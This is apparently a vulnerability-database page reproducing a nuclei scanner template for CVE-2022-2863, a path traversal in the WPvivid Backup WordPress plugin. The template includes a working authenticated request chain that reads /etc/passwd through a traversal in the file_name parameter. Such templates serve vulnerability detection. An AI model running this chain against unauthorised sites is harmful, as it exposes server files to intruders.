Lucene search
K

WordPress WPvivid Backup <0.9.76 - Local File Inclusion

šŸ—“ļøĀ 22 Jun 2026Ā 05:20:07Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 35Ā Views

WordPress WPvivid Backup <0.9.76 - Local File Inclusion vulnerability allows unauthorized file acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress WPvivid Backup Path Traversal Vulnerability
5 Oct 202200:00
–zdt
ATTACKERKB
CVE-2022-2863
16 Sep 202209:15
–attackerkb
Circl
CVE-2022-2863
16 Sep 202212:38
–circl
CNNVD
WordPress plugin Migration, Backup, Staging č·Æå¾„éåŽ†ę¼ę“ž
16 Sep 202200:00
–cnnvd
CVE
CVE-2022-2863
16 Sep 202200:00
–cve
Cvelist
CVE-2022-2863 WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read
16 Sep 202200:00
–cvelist
EUVD
EUVD-2022-35097
3 Oct 202520:07
–euvd
NVD
CVE-2022-2863
16 Sep 202209:15
–nvd
OpenVAS
WordPress Migration, Backup, Staging - WPvivid Plugin < 0.9.76 Directory Traversal Vulnerability
19 Sep 202200:00
–openvas
Packet Storm
WordPress WPvivid Backup Path Traversal
4 Oct 202200:00
–packetstorm
Rows per page
id: CVE-2022-2863

info:
  name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion
  author: tehtbl
  severity: medium
  description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
  remediation: Upgrade to version 0.9.76 or later.
  reference:
    - https://seclists.org/fulldisclosure/2022/Oct/0
    - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5
    - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2863
    - https://github.com/rodnt/rodnt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-2863
    cwe-id: CWE-22
    epss-score: 0.17671
    epss-percentile: 0.9677
    cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: wpvivid
    product: migration\,_backup\,_staging
    framework: wordpress
  tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=WPvivid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"_ajax_nonce":"([0-9a-z]+)"'
        internal: true
        part: body
# digest: 4b0a00483046022100de7570b3e7dd98cf40bb2ec10e2746072292bd62b833352c2742dcbd859dadd702210087e843aa65904ea545da4b75ec3ed967a49ada904ceec123ab659326d6c357d1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.9
EPSS0.17671
35